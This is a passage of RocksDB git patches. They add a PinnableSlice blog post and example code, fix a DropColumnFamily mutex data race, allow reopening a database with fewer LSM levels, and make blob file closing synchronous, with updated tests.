b/docs/_posts/2017-05-12-partitioned-index-filter.markdown index fb4f62cd8ea..a537feb0c7e 100644 --- a/docs/_posts/2017-05-12-partitioned-index-filter.markdown +++ b/docs/_posts/2017-05-12-partitioned-index-filter.markdown @@ -31,4 +31,4 @@ In this example we have a DB of size 86G on HDD and emulate the small memory tha In this example we have a DB of size 300G on SSD and emulate the small memory that would be available in presence of other DBs on the same node by by using direct IO (skipping OS file cache) and block cache of size 6G and 2G. Without partitioning the linkbench throughput drops from 38k tps to 23k when reducing block cache size from 6G to 2G. With partitioning the throughput drops from 38k to only 30k. -Learn more (here)[https://github.com/facebook/rocksdb/wiki/Partitioned-Index-Filters]. +Learn more [here](https://github.com/facebook/rocksdb/wiki/Partitioned-Index-Filters). diff --git a/docs/_posts/2017-08-24-pinnableslice.markdown b/docs/_posts/2017-08-24-pinnableslice.markdown new file mode 100644 index 00000000000..a5026d5c4c7 --- /dev/null +++ b/docs/_posts/2017-08-24-pinnableslice.markdown @@ -0,0 +1,37 @@ +--- +title: PinnableSlice: less memcpy with point lookups +layout: post +author: maysamyabandeh +category: blog +--- + +The classic API for [DB::Get](https://github.com/facebook/rocksdb/blob/9e583711144f580390ce21a49a8ceacca338fcd5/include/rocksdb/db.h#L310) receives a std::string as argument to which it will copy the value. The memcpy overhead could be non-trivial when the value is large. 
The [new API](https://github.com/facebook/rocksdb/blob/9e583711144f580390ce21a49a8ceacca338fcd5/include/rocksdb/db.h#L322) receives a PinnableSlice instead, which avoids memcpy in most of the cases.
+
+### What is PinnableSlice?
+
+Similarly to Slice, PinnableSlice refers to some in-memory data so it does not incur the memcpy cost. To ensure that the data will not be erased while it is being processed by the user, PinnableSlice, as its name suggests, has the data pinned in memory. The pinned data are released when the PinnableSlice object is destructed or when ::Reset is invoked explicitly on it.
+
+### How good it is?
+
+Here are the improvements in throughput for an [in-memory benchmark](https://github.com/facebook/rocksdb/pull/1756#issuecomment-286201693):
+* value 1k byte: 14%
+* value 10k byte: 34%
+
+### Any limitations?
+
+PinnableSlice tries to avoid memcpy as much as possible. The primary gain is when reading large values from the block cache. There are however cases where it would still have to copy the data into its internal buffer. The reason is mainly the complexity of implementation; if there is enough motivation on the application side, the scope of PinnableSlice could be extended to such cases too. These include:
+* Merged values
+* Reads from memtables
+
+### How to use it?
+
+```cpp
+PinnableSlice pinnable_val;
+while (!stopped) {
+  auto s = db->Get(opt, cf, key, &pinnable_val);
+  // ... use it
+  pinnable_val.Reset();  // then release it immediately
+}
+```
+
+You can also [initialize the internal buffer](https://github.com/facebook/rocksdb/blob/9e583711144f580390ce21a49a8ceacca338fcd5/include/rocksdb/db.h#L314) of PinnableSlice by passing your own string in the constructor. [simple_example.cc](https://github.com/facebook/rocksdb/blob/master/examples/simple_example.cc) demonstrates that with more examples.

diff --git a/examples/simple_example.cc b/examples/simple_example.cc
index 52fffff5bf7..a8f80f091e6 100644
--- a/examples/simple_example.cc
+++ b/examples/simple_example.cc
@@ -50,6 +50,33 @@ int main() {
   db->Get(ReadOptions(), "key2", &value);
   assert(value == "value");

+  {
+    PinnableSlice pinnable_val;
+    db->Get(ReadOptions(), db->DefaultColumnFamily(), "key2", &pinnable_val);
+    assert(pinnable_val == "value");
+  }
+
+  {
+    std::string string_val;
+    // If it cannot pin the value, it copies the value to its internal buffer.
+    // The internal buffer could be set during construction.
+    PinnableSlice pinnable_val(&string_val);
+    db->Get(ReadOptions(), db->DefaultColumnFamily(), "key2", &pinnable_val);
+    assert(pinnable_val == "value");
+    // If the value is not pinned, the internal buffer must have the value.
+    assert(pinnable_val.IsPinned() || string_val == "value");
+  }
+
+  PinnableSlice pinnable_val;
+  s = db->Get(ReadOptions(), db->DefaultColumnFamily(), "key1", &pinnable_val);
+  assert(s.IsNotFound());
+  // Reset PinnableSlice after each use and before each reuse
+  pinnable_val.Reset();
+  db->Get(ReadOptions(), db->DefaultColumnFamily(), "key2", &pinnable_val);
+  assert(pinnable_val == "value");
+  pinnable_val.Reset();
+  // The Slice pointed by pinnable_val is not valid after this point
+
   delete db;

   return 0;

From 92bfd6c5078fa7bbf7a2caacfddbec255e9098ba Mon Sep 17 00:00:00 2001
From: Yi Wu
Date: Thu, 24 Aug 2017 14:54:57 -0700
Subject: [PATCH 151/205] Fix DropColumnFamily data race

Summary:
It should hold the db mutex while accessing max_total_in_memory_state_.
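The invariant behind the fix, as a minimal sketch with illustrative names (a toy class, not RocksDB's types): an aggregate derived from mutable per-CF options must be read and updated under the same mutex that guards those options, otherwise a concurrent SetOptions() can race with the subtraction:

```cpp
#include <cstdint>
#include <mutex>

struct ToyDB {
  std::mutex db_mutex;  // plays the role of the db mutex
  uint64_t write_buffer_size = 64u << 20;
  int max_write_buffer_number = 2;
  uint64_t max_total_in_memory_state = 128u << 20;

  void DropColumnFamily() {
    std::lock_guard<std::mutex> guard(db_mutex);
    // Reading the options and adjusting the aggregate under one lock keeps
    // the pair consistent even if another thread changes the options.
    max_total_in_memory_state -=
        write_buffer_size * static_cast<uint64_t>(max_write_buffer_number);
  }
};
```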
Closes https://github.com/facebook/rocksdb/pull/2784

Differential Revision: D5696536

Pulled By: yiwu-arbug

fbshipit-source-id: 45430634d7fe11909b38e42e5f169f618681c4ee
---
 db/db_impl.cc | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)

diff --git a/db/db_impl.cc b/db/db_impl.cc
index a197ca5c8b0..4aba14c6077 100644
--- a/db/db_impl.cc
+++ b/db/db_impl.cc
@@ -1324,6 +1324,11 @@ Status DBImpl::DropColumnFamilyImpl(ColumnFamilyHandle* column_family) {
                                 &edit, &mutex_);
     write_thread_.ExitUnbatched(&w);
   }
+  if (s.ok()) {
+    auto* mutable_cf_options = cfd->GetLatestMutableCFOptions();
+    max_total_in_memory_state_ -= mutable_cf_options->write_buffer_size *
+                                  mutable_cf_options->max_write_buffer_number;
+  }

   if (!cf_support_snapshot) {
     // Dropped Column Family doesn't support snapshot. Need to recalculate
@@ -1345,9 +1350,6 @@ Status DBImpl::DropColumnFamilyImpl(ColumnFamilyHandle* column_family) {
     // later inside db_mutex.
     EraseThreadStatusCfInfo(cfd);
     assert(cfd->IsDropped());
-    auto* mutable_cf_options = cfd->GetLatestMutableCFOptions();
-    max_total_in_memory_state_ -= mutable_cf_options->write_buffer_size *
-                                  mutable_cf_options->max_write_buffer_number;
     ROCKS_LOG_INFO(immutable_db_options_.info_log,
                    "Dropped column family with id %u\n", cfd->GetID());
   } else {

From 3c840d1a6dc194a6dcdbf886b0438dc176804c44 Mon Sep 17 00:00:00 2001
From: Yi Wu
Date: Thu, 24 Aug 2017 16:05:16 -0700
Subject: [PATCH 152/205] Allow DB reopen with reduced options.num_levels

Summary:
Allow the user to reduce the number of levels in the LSM by issuing a full CompactRange() that puts the result in a lower level, and then reopening the DB with a reduced options.num_levels. Previously this would fail on reopen when recovery, while replaying the previous MANIFEST, found a historical file on a higher level than the new options.num_levels. The workaround was, after CompactRange(), to reopen the DB with the old num_levels (which creates a new MANIFEST) and then reopen the DB again with the new num_levels.

This patch relaxes the check of levels during recovery. It allows the DB to open if there was a historical file on a level > options.num_levels, as long as that file was also deleted.

Closes https://github.com/facebook/rocksdb/pull/2740

Differential Revision: D5629354

Pulled By: yiwu-arbug

fbshipit-source-id: 545903f6b36b6083e8cbaf777176aef2f488021d
---
 db/db_test2.cc        | 21 +++++++++
 db/version_builder.cc | 99 +++++++++++++++++++++++++++++++++----------
 db/version_builder.h  |  1 +
 db/version_set.cc     | 17 +++++---
 4 files changed, 111 insertions(+), 27 deletions(-)

diff --git a/db/db_test2.cc b/db/db_test2.cc
index c223f2b0082..8f00d20e7a8 100644
--- a/db/db_test2.cc
+++ b/db/db_test2.cc
@@ -2304,6 +2304,27 @@ TEST_F(DBTest2, RateLimitedCompactionReads) {
   }
 }
 #endif  // ROCKSDB_LITE
+
+// Make sure the DB can be reopened with a reduced number of levels, given no
+// file is on levels higher than the new num_levels.
+TEST_F(DBTest2, ReduceLevel) {
+  Options options;
+  options.disable_auto_compactions = true;
+  options.num_levels = 7;
+  Reopen(options);
+  Put("foo", "bar");
+  Flush();
+  MoveFilesToLevel(6);
+  ASSERT_EQ("0,0,0,0,0,0,1", FilesPerLevel());
+  CompactRangeOptions compact_options;
+  compact_options.change_level = true;
+  compact_options.target_level = 1;
+  dbfull()->CompactRange(compact_options, nullptr, nullptr);
+  ASSERT_EQ("0,1", FilesPerLevel());
+  options.num_levels = 3;
+  Reopen(options);
+  ASSERT_EQ("0,1", FilesPerLevel());
+}

 }  // namespace rocksdb

 int main(int argc, char** argv) {

diff --git a/db/version_builder.cc b/db/version_builder.cc
index bab8d11f5a5..e8db67527ea 100644
--- a/db/version_builder.cc
+++ b/db/version_builder.cc
@@ -17,6 +17,7 @@
 #include <algorithm>
 #include <atomic>
 #include <functional>
+#include <map>
 #include <set>
 #include <thread>
 #include <unordered_map>
@@ -87,7 +88,16 @@ class VersionBuilder::Rep {
   Logger* info_log_;
   TableCache* table_cache_;
   VersionStorageInfo* base_vstorage_;
+  int num_levels_;
   LevelState* levels_;
+  // Store states of levels larger than num_levels_. We do this instead of
+  // storing them in levels_ to avoid regression in case there are no files
+  // on invalid levels. The version is not consistent if in the end the files
+  // on invalid levels don't cancel out.
+  std::map<int, std::unordered_set<uint64_t>> invalid_levels_;
+  // Whether there are invalid new files or invalid deletions on levels
+  // larger than num_levels_.
+  bool has_invalid_levels_;
   FileComparator level_zero_cmp_;
   FileComparator level_nonzero_cmp_;

@@ -97,8 +107,10 @@ class VersionBuilder::Rep {
       : env_options_(env_options),
         info_log_(info_log),
         table_cache_(table_cache),
-        base_vstorage_(base_vstorage) {
-    levels_ = new LevelState[base_vstorage_->num_levels()];
+        base_vstorage_(base_vstorage),
+        num_levels_(base_vstorage->num_levels()),
+        has_invalid_levels_(false) {
+    levels_ = new LevelState[num_levels_];
     level_zero_cmp_.sort_method = FileComparator::kLevel0;
     level_nonzero_cmp_.sort_method = FileComparator::kLevelNon0;
     level_nonzero_cmp_.internal_comparator =
@@ -106,7 +118,7 @@ class VersionBuilder::Rep {
   }

   ~Rep() {
-    for (int level = 0; level < base_vstorage_->num_levels(); level++) {
+    for (int level = 0; level < num_levels_; level++) {
       const auto& added = levels_[level].added_files;
       for (auto& pair : added) {
         UnrefFile(pair.second);
@@ -137,7 +149,7 @@ class VersionBuilder::Rep {
     }
 #endif
     // make sure the files are sorted correctly
-    for (int level = 0; level < vstorage->num_levels(); level++) {
+    for (int level = 0; level < num_levels_; level++) {
       auto& level_files = vstorage->LevelFiles(level);
       for (size_t i = 1; i < level_files.size(); i++) {
         auto f1 = level_files[i - 1];
@@ -196,7 +208,7 @@ class VersionBuilder::Rep {
 #endif
     // a file to be deleted better exist in the previous version
     bool found = false;
-    for (int l = 0; !found && l < base_vstorage_->num_levels(); l++) {
+    for (int l = 0; !found && l < num_levels_; l++) {
       const std::vector<FileMetaData*>& base_files =
           base_vstorage_->LevelFiles(l);
       for (size_t i = 0; i < base_files.size(); i++) {
@@ -210,7 +222,7 @@ class VersionBuilder::Rep {
     // if the file did not exist in the previous version, then it
     // is possibly moved from lower level to higher level in current
     // version
-    for (int l = level + 1; !found && l < base_vstorage_->num_levels(); l++) {
+    for (int l = level + 1; !found && l < num_levels_; l++) {
       auto& level_added = levels_[l].added_files;
       auto got = level_added.find(number);
       if (got != level_added.end()) {
@@ -233,6 +245,19 @@
     }
   }

+  bool CheckConsistencyForNumLevels() {
+    // Make sure there are no files on or beyond num_levels().
+    if (has_invalid_levels_) {
+      return false;
+    }
+    for (auto& level : invalid_levels_) {
+      if (level.second.size() > 0) {
+        return false;
+      }
+    }
+    return true;
+  }
+
   // Apply all of the edits in *edit to the current state.
   void Apply(VersionEdit* edit) {
     CheckConsistency(base_vstorage_);
@@ -242,26 +267,45 @@
     for (const auto& del_file : del) {
       const auto level = del_file.first;
       const auto number = del_file.second;
-      levels_[level].deleted_files.insert(number);
-      CheckConsistencyForDeletes(edit, number, level);
-
-      auto exising = levels_[level].added_files.find(number);
-      if (exising != levels_[level].added_files.end()) {
-        UnrefFile(exising->second);
-        levels_[level].added_files.erase(number);
+      if (level < num_levels_) {
+        levels_[level].deleted_files.insert(number);
+        CheckConsistencyForDeletes(edit, number, level);
+
+        auto exising = levels_[level].added_files.find(number);
+        if (exising != levels_[level].added_files.end()) {
+          UnrefFile(exising->second);
+          levels_[level].added_files.erase(number);
+        }
+      } else {
+        if (invalid_levels_[level].count(number) > 0) {
+          invalid_levels_[level].erase(number);
+        } else {
+          // Deleting a non-existing file on an invalid level.
+          has_invalid_levels_ = true;
+        }
       }
     }

     // Add new files
     for (const auto& new_file : edit->GetNewFiles()) {
       const int level = new_file.first;
-      FileMetaData* f = new FileMetaData(new_file.second);
-      f->refs = 1;
-
-      assert(levels_[level].added_files.find(f->fd.GetNumber()) ==
-             levels_[level].added_files.end());
-      levels_[level].deleted_files.erase(f->fd.GetNumber());
-      levels_[level].added_files[f->fd.GetNumber()] = f;
+      if (level < num_levels_) {
+        FileMetaData* f = new FileMetaData(new_file.second);
+        f->refs = 1;
+
+        assert(levels_[level].added_files.find(f->fd.GetNumber()) ==
+               levels_[level].added_files.end());
+        levels_[level].deleted_files.erase(f->fd.GetNumber());
+        levels_[level].added_files[f->fd.GetNumber()] = f;
+      } else {
+        uint64_t number = new_file.second.fd.GetNumber();
+        if (invalid_levels_[level].count(number) == 0) {
+          invalid_levels_[level].insert(number);
+        } else {
+          // Creating an already existing file on an invalid level.
+          has_invalid_levels_ = true;
+        }
+      }
     }
   }

@@ -270,7 +314,7 @@
     CheckConsistency(base_vstorage_);
     CheckConsistency(vstorage);

-    for (int level = 0; level < base_vstorage_->num_levels(); level++) {
+    for (int level = 0; level < num_levels_; level++) {
       const auto& cmp = (level == 0) ? level_zero_cmp_ : level_nonzero_cmp_;
       // Merge the set of added files with the set of pre-existing files.
       // Drop any deleted files. Store the result in *v.
@@ -325,7 +369,7 @@ class VersionBuilder::Rep { assert(table_cache_ != nullptr); // std::vector> files_meta; - for (int level = 0; level < base_vstorage_->num_levels(); level++) { + for (int level = 0; level < num_levels_; level++) { for (auto& file_meta_pair : levels_[level].added_files) { auto* file_meta = file_meta_pair.second; assert(!file_meta->table_reader_handle); @@ -386,24 +430,35 @@ VersionBuilder::VersionBuilder(const EnvOptions& env_options, VersionStorageInfo* base_vstorage, Logger* info_log) : rep_(new Rep(env_options, info_log, table_cache, base_vstorage)) {} + VersionBuilder::~VersionBuilder() { delete rep_; } + void VersionBuilder::CheckConsistency(VersionStorageInfo* vstorage) { rep_->CheckConsistency(vstorage); } + void VersionBuilder::CheckConsistencyForDeletes(VersionEdit* edit, uint64_t number, int level) { rep_->CheckConsistencyForDeletes(edit, number, level); } + +bool VersionBuilder::CheckConsistencyForNumLevels() { + return rep_->CheckConsistencyForNumLevels(); +} + void VersionBuilder::Apply(VersionEdit* edit) { rep_->Apply(edit); } + void VersionBuilder::SaveTo(VersionStorageInfo* vstorage) { rep_->SaveTo(vstorage); } + void VersionBuilder::LoadTableHandlers( InternalStats* internal_stats, int max_threads, bool prefetch_index_and_filter_in_cache) { rep_->LoadTableHandlers(internal_stats, max_threads, prefetch_index_and_filter_in_cache); } + void VersionBuilder::MaybeAddFile(VersionStorageInfo* vstorage, int level, FileMetaData* f) { rep_->MaybeAddFile(vstorage, level, f); diff --git a/db/version_builder.h b/db/version_builder.h index 235f79d7f5d..440d4eaf6ba 100644 --- a/db/version_builder.h +++ b/db/version_builder.h @@ -29,6 +29,7 @@ class VersionBuilder { void CheckConsistency(VersionStorageInfo* vstorage); void CheckConsistencyForDeletes(VersionEdit* edit, uint64_t number, int level); + bool CheckConsistencyForNumLevels(); void Apply(VersionEdit* edit); void SaveTo(VersionStorageInfo* vstorage); void LoadTableHandlers(InternalStats* internal_stats, int max_threads, diff --git a/db/version_set.cc b/db/version_set.cc index 6b9611aa9bd..2ff425d2019 100644 --- a/db/version_set.cc +++ b/db/version_set.cc @@ -2842,11 +2842,6 @@ Status VersionSet::Recover( cfd = column_family_set_->GetColumnFamily(edit.column_family_); // this should never happen since cf_in_builders is true assert(cfd != nullptr); - if (edit.max_level_ >= cfd->current()->storage_info()->num_levels()) { - s = Status::InvalidArgument( - "db has more levels than options.num_levels"); - break; - } // if it is not column family add or column family drop, // then it's a file add/delete, which should be forwarded @@ -2930,6 +2925,18 @@ Status VersionSet::Recover( list_of_not_found); } + if (s.ok()) { + for (auto cfd : *column_family_set_) { + assert(builders.count(cfd->GetID()) > 0); + auto* builder = builders[cfd->GetID()]->version_builder(); + if (!builder->CheckConsistencyForNumLevels()) { + s = Status::InvalidArgument( + "db has more levels than options.num_levels"); + break; + } + } + } + if (s.ok()) { for (auto cfd : *column_family_set_) { if (cfd->IsDropped()) { From 503db684f72061b98d2200debafcc750b7f8de67 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Fri, 25 Aug 2017 10:40:25 -0700 Subject: [PATCH 153/205] make blob file close synchronous Summary: Fixing flaky blob_db_test. To close a blob file, blob db used to add a CloseSeqWrite job to the background thread to close it. Changing file close to be synchronous in order to simplify logic, and fix flaky blob_db_test. 
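The shape of the simplification, as a hedged sketch with stand-in types (`ToyStatus` and `ToyBlobFile` are illustrative, not the real RocksDB classes): the footer is written and the file closed inline, so the caller observes the resulting status instead of a background job swallowing it:

```cpp
#include <memory>

struct ToyStatus {
  bool ok_ = true;
  bool ok() const { return ok_; }
};

struct ToyBlobFile {
  ToyStatus WriteFooterAndClose() { return ToyStatus{}; }
};

// Synchronous close: failures surface immediately to the caller, and tests
// no longer race against a queued background close job.
ToyStatus CloseBlobFile(const std::shared_ptr<ToyBlobFile>& file) {
  return file->WriteFooterAndClose();
}
```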
Closes https://github.com/facebook/rocksdb/pull/2787 Differential Revision: D5699387 Pulled By: yiwu-arbug fbshipit-source-id: dd07a945cd435cd3808fce7ee4ea57817409474a --- utilities/blob_db/blob_db_impl.cc | 82 ++++++++++++++----------------- utilities/blob_db/blob_db_impl.h | 16 +++--- utilities/blob_db/blob_db_test.cc | 21 ++++---- 3 files changed, 54 insertions(+), 65 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index d787529b1da..553f89f2a58 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -891,7 +891,10 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { } if (blob_inserter.has_put()) { - CloseIf(blob_inserter.last_file()); + s = CloseBlobFileIfNeeded(blob_inserter.last_file()); + if (!s.ok()) { + return s; + } } // add deleted key to list of keys that have been deleted for book-keeping @@ -1022,7 +1025,9 @@ Status BlobDBImpl::PutUntil(const WriteOptions& options, extendTTL(&(bfile->ttl_range_), expiration); } - CloseIf(bfile); + if (s.ok()) { + s = CloseBlobFileIfNeeded(bfile); + } TEST_SYNC_POINT("BlobDBImpl::PutUntil:Finish"); return s; @@ -1362,58 +1367,44 @@ std::pair BlobDBImpl::SanityCheck(bool aborted) { return std::make_pair(true, -1); } -std::pair BlobDBImpl::CloseSeqWrite( - std::shared_ptr bfile, bool aborted) { +Status BlobDBImpl::CloseBlobFile(std::shared_ptr bfile) { + Status s; + ROCKS_LOG_INFO(db_options_.info_log, "Close blob file %" PRIu64, + bfile->BlobFileNumber()); { WriteLock wl(&mutex_); - // this prevents others from picking up this file - open_blob_files_.erase(bfile); - - auto findit = - std::find(open_simple_files_.begin(), open_simple_files_.end(), bfile); - if (findit != open_simple_files_.end()) open_simple_files_.erase(findit); + if (bfile->HasTTL()) { + size_t erased __attribute__((__unused__)) = open_blob_files_.erase(bfile); + assert(erased == 1); + } else { + auto iter = std::find(open_simple_files_.begin(), + open_simple_files_.end(), bfile); + assert(iter != open_simple_files_.end()); + open_simple_files_.erase(iter); + } } if (!bfile->closed_.load()) { WriteLock lockbfile_w(&bfile->mutex_); - bfile->WriteFooterAndCloseLocked(); + s = bfile->WriteFooterAndCloseLocked(); } - return std::make_pair(false, -1); -} - -void BlobDBImpl::CloseIf(const std::shared_ptr& bfile) { - // atomic read - bool close = bfile->GetFileSize() > bdb_options_.blob_file_size; - if (!close) return; - - if (debug_level_ >= 2) { - ROCKS_LOG_DEBUG(db_options_.info_log, - "Scheduling file for close %s fsize: %" PRIu64 - " limit: %" PRIu64, - bfile->PathName().c_str(), bfile->GetFileSize(), - bdb_options_.blob_file_size); + if (!s.ok()) { + ROCKS_LOG_ERROR(db_options_.info_log, + "Failed to close blob file %" PRIu64 "with error: %s", + bfile->BlobFileNumber(), s.ToString().c_str()); } - { - WriteLock wl(&mutex_); + return s; +} - open_blob_files_.erase(bfile); - auto findit = - std::find(open_simple_files_.begin(), open_simple_files_.end(), bfile); - if (findit != open_simple_files_.end()) { - open_simple_files_.erase(findit); - } else { - ROCKS_LOG_WARN(db_options_.info_log, - "File not found while closing %s fsize: %" PRIu64 - " Multithreaded Writes?", - bfile->PathName().c_str(), bfile->GetFileSize()); - } +Status BlobDBImpl::CloseBlobFileIfNeeded(std::shared_ptr& bfile) { + // atomic read + if (bfile->GetFileSize() < bdb_options_.blob_file_size) { + return Status::OK(); } - - tqueue_.add(0, std::bind(&BlobDBImpl::CloseSeqWrite, this, bfile, - 
std::placeholders::_1)); + return CloseBlobFile(bfile); } bool BlobDBImpl::FileDeleteOk_SnapshotCheckLocked( @@ -1585,7 +1576,7 @@ std::pair BlobDBImpl::CheckSeqFiles(bool aborted) { } for (auto bfile : process_files) { - CloseSeqWrite(bfile, false); + CloseBlobFile(bfile); } return std::make_pair(true, -1); @@ -1916,7 +1907,8 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, delete transaction; } ROCKS_LOG_INFO( - db_options_.info_log, "%s blob file %" PRIu64 ".", + db_options_.info_log, + "%s blob file %" PRIu64 ". Total blob records: %" PRIu64 ", Deletes: %" PRIu64 "/%" PRIu64 " succeeded, Relocates: %" PRIu64 "/%" PRIu64 " succeeded.", s.ok() ? "Successfully garbage collected" : "Failed to garbage collect", @@ -2334,8 +2326,8 @@ void BlobDBImpl::TEST_DeleteObsoleteFiles() { DeleteObsoleteFiles(false /*abort*/); } -void BlobDBImpl::TEST_CloseBlobFile(std::shared_ptr& bfile) { - CloseSeqWrite(bfile, false /*abort*/); +Status BlobDBImpl::TEST_CloseBlobFile(std::shared_ptr& bfile) { + return CloseBlobFile(bfile); } Status BlobDBImpl::TEST_GCFileAndUpdateLSM(std::shared_ptr& bfile, diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index 9886dbe5b21..e7c49b20d4d 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -263,7 +263,7 @@ class BlobDBImpl : public BlobDB { std::vector> TEST_GetObsoleteFiles() const; - void TEST_CloseBlobFile(std::shared_ptr& bfile); + Status TEST_CloseBlobFile(std::shared_ptr& bfile); Status TEST_GCFileAndUpdateLSM(std::shared_ptr& bfile, GCStats* gc_stats); @@ -293,11 +293,6 @@ class BlobDBImpl : public BlobDB { // this handler is called. void OnFlushBeginHandler(DB* db, const FlushJobInfo& info); - // timer queue callback to close a file by appending a footer - // removes file from open files list - std::pair CloseSeqWrite(std::shared_ptr bfile, - bool aborted); - // is this file ready for Garbage collection. if the TTL of the file // has expired or if threshold of the file has been evicted // tt - current time @@ -308,8 +303,11 @@ class BlobDBImpl : public BlobDB { // collect all the blob log files from the blob directory Status GetAllLogFiles(std::set>* file_nums); - // appends a task into timer queue to close the file - void CloseIf(const std::shared_ptr& bfile); + // Close a file by appending a footer, and removes file from open files list. + Status CloseBlobFile(std::shared_ptr bfile); + + // Close a file if its size exceeds blob_file_size + Status CloseBlobFileIfNeeded(std::shared_ptr& bfile); uint64_t ExtractExpiration(const Slice& key, const Slice& value, Slice* value_slice, std::string* new_value); @@ -470,7 +468,7 @@ class BlobDBImpl : public BlobDB { // epoch or version of the open files. std::atomic epoch_of_; - // typically we keep 4 open blob files (simple i.e. no TTL) + // All opened non-TTL blob files. 
std::vector> open_simple_files_; // all the blob files which are currently being appended to based diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 8ec01698aa8..41c1482e7e6 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -185,7 +185,7 @@ TEST_F(BlobDBTest, PutWithTTL) { auto blob_files = bdb_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); ASSERT_TRUE(blob_files[0]->HasTTL()); - bdb_impl->TEST_CloseBlobFile(blob_files[0]); + ASSERT_OK(bdb_impl->TEST_CloseBlobFile(blob_files[0])); GCStats gc_stats; ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); ASSERT_EQ(100 - data.size(), gc_stats.num_deletes); @@ -214,7 +214,7 @@ TEST_F(BlobDBTest, PutUntil) { auto blob_files = bdb_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); ASSERT_TRUE(blob_files[0]->HasTTL()); - bdb_impl->TEST_CloseBlobFile(blob_files[0]); + ASSERT_OK(bdb_impl->TEST_CloseBlobFile(blob_files[0])); GCStats gc_stats; ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); ASSERT_EQ(100 - data.size(), gc_stats.num_deletes); @@ -246,7 +246,7 @@ TEST_F(BlobDBTest, TTLExtrator_NoTTL) { auto blob_files = bdb_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); ASSERT_FALSE(blob_files[0]->HasTTL()); - bdb_impl->TEST_CloseBlobFile(blob_files[0]); + ASSERT_OK(bdb_impl->TEST_CloseBlobFile(blob_files[0])); GCStats gc_stats; ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); ASSERT_EQ(0, gc_stats.num_deletes); @@ -291,7 +291,7 @@ TEST_F(BlobDBTest, TTLExtractor_ExtractTTL) { auto blob_files = bdb_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); ASSERT_TRUE(blob_files[0]->HasTTL()); - bdb_impl->TEST_CloseBlobFile(blob_files[0]); + ASSERT_OK(bdb_impl->TEST_CloseBlobFile(blob_files[0])); GCStats gc_stats; ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); auto &data = static_cast(ttl_extractor_.get())->data; @@ -338,7 +338,7 @@ TEST_F(BlobDBTest, TTLExtractor_ExtractExpiration) { auto blob_files = bdb_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); ASSERT_TRUE(blob_files[0]->HasTTL()); - bdb_impl->TEST_CloseBlobFile(blob_files[0]); + ASSERT_OK(bdb_impl->TEST_CloseBlobFile(blob_files[0])); GCStats gc_stats; ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); auto &data = static_cast(ttl_extractor_.get())->data; @@ -395,7 +395,7 @@ TEST_F(BlobDBTest, TTLExtractor_ChangeValue) { auto blob_files = bdb_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); ASSERT_TRUE(blob_files[0]->HasTTL()); - bdb_impl->TEST_CloseBlobFile(blob_files[0]); + ASSERT_OK(bdb_impl->TEST_CloseBlobFile(blob_files[0])); GCStats gc_stats; ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); ASSERT_EQ(100 - data.size(), gc_stats.num_deletes); @@ -592,7 +592,7 @@ TEST_F(BlobDBTest, GCAfterOverwriteKeys) { } auto blob_files = blob_db_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); - blob_db_impl->TEST_CloseBlobFile(blob_files[0]); + ASSERT_OK(blob_db_impl->TEST_CloseBlobFile(blob_files[0])); // Test for data in SST size_t new_keys = 0; for (int i = 0; i < 100; i++) { @@ -627,7 +627,7 @@ TEST_F(BlobDBTest, GCRelocateKeyWhileOverwriting) { static_cast_with_check(blob_db_); auto blob_files = blob_db_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); - blob_db_impl->TEST_CloseBlobFile(blob_files[0]); + ASSERT_OK(blob_db_impl->TEST_CloseBlobFile(blob_files[0])); SyncPoint::GetInstance()->LoadDependency( 
{{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetForUpdate", @@ -663,7 +663,7 @@ TEST_F(BlobDBTest, GCExpiredKeyWhileOverwriting) { static_cast_with_check(blob_db_); auto blob_files = blob_db_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); - blob_db_impl->TEST_CloseBlobFile(blob_files[0]); + ASSERT_OK(blob_db_impl->TEST_CloseBlobFile(blob_files[0])); mock_env_->set_now_micros(300 * 1000000); SyncPoint::GetInstance()->LoadDependency( @@ -708,7 +708,6 @@ TEST_F(BlobDBTest, GCOldestSimpleBlobFileWhenOutOfSpace) { ASSERT_EQ(11, blob_files.size()); ASSERT_TRUE(blob_files[0]->HasTTL()); ASSERT_TRUE(blob_files[0]->Immutable()); - blob_db_impl->TEST_CloseBlobFile(blob_files[0]); for (int i = 1; i <= 10; i++) { ASSERT_FALSE(blob_files[i]->HasTTL()); if (i < 10) { @@ -736,7 +735,7 @@ TEST_F(BlobDBTest, ReadWhileGC) { ASSERT_EQ(1, blob_files.size()); std::shared_ptr bfile = blob_files[0]; uint64_t bfile_number = bfile->BlobFileNumber(); - blob_db_impl->TEST_CloseBlobFile(bfile); + ASSERT_OK(blob_db_impl->TEST_CloseBlobFile(bfile)); switch (i) { case 0: From b01f426f56c83815d3664f3ba69ff758fcdc8772 